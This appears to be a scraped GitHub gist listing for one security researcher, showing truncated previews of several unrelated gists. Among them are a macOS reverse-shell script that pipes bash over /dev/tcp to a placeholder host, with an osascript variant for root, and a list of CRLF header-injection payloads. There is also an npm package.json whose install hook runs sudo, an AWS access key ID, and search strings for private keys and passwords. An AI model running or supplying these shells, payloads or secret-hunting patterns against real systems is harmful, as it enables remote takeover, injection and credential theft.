- elevation of privilege
- password exploits
- incorrectly set permissions
- leveraging SUID/SGID programs
- code injection
- trojaned commands
- PATH exploits
- misspelling exploit
- symbolic link exploits
- document exploits
V6R Metnew
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "global": { | |
| "check_for_updates_on_startup": true, | |
| "show_in_menu_bar": true, | |
| "show_profile_name_in_menu_bar": false | |
| }, | |
| "profiles": [{ | |
| "complex_modifications": { | |
| "parameters": { | |
| "basic.simultaneous_threshold_milliseconds": 50, |
Metnew
/ package.json
Created
December 21, 2018 02:09
Experiment with permissions when installing malicious packages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "name": "saferoot", | |
| "version": "0.0.1", | |
| "description": "", | |
| "main": "index.js", | |
| "scripts": { | |
| "install": "sudo id", | |
| "pre--install": "#sudo npm i --unsafe-perm" | |
| }, | |
| "author": "", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %0AHeader-Test:BLATRUC | |
| %0A%20Header-Test:BLATRUC | |
| %20%0AHeader-Test:BLATRUC | |
| %23%OAHeader-Test:BLATRUC | |
| %E5%98%8A%E5%98%8DHeader-Test:BLATRUC | |
| %E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC | |
| %3F%0AHeader-Test:BLATRUC | |
| crlf%0AHeader-Test:BLATRUC | |
| crlf%0A%20Header-Test:BLATRUC | |
| crlf%20%0AHeader-Test:BLATRUC |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws_access_key_id = AKIABTFXD4NW55DB7X3423 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| "app", | |
| "cloud", | |
| "com", | |
| "guide", | |
| "io", | |
| "net", | |
| "online", | |
| "org", | |
| "plus", |
Metnew
/ nmap-hero.md
Last active
December 12, 2018 14:10
Nmap for haxers, <your_tool> for scriptkiddies.
-F (Fast (limited port) scan) Specifies that you wish to scan fewer ports than the default. Normally Nmap scans the most common 1,000 ports for each scanned protocol. With -F, this is reduced to 100.
Nmap needs an nmap-services file with frequency information in order to know which ports are the most common (see the section called “Well Known Port List: nmap-services” for more about port frequencies). If port frequency information isn't available, perhaps because of the use of a custom nmap-services file, Nmap scans all named ports plus ports 1-1024. In that case, -F means to scan only ports that are named in the services file.
Metnew
/ gist:09a50c38d398c482b2df59082f0d13c6
Created
December 6, 2018 17:47
macos-reverse-shell.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # C2 | |
| # nc -l 1337 | |
| # Root | |
| osascript -e "do shell script \"bash -i >& /dev/tcp/client.ip/1337 0>&1 \" with administrator privileges" | |
| # User | |
| bash -i >& /dev/tcp/client.ip/1337 0>&1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| brew update | |
| brew upgrade | |
| sudo nvram SystemAudioVolume=" " | |
| sudo -v | |
| brew install nano | |
| # brew unlink nano && brew link nano | |
| brew install jq |
Metnew
/ test.htpasswd
Created
November 29, 2018 23:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dropbox | |
| -----BEGIN PGP PRIVATE KEY BLOCK----- | |
| -----BEGIN EC PRIVATE KEY----- | |
| -----BEGIN DSA PRIVATE KEY----- | |
| password | |
| credential |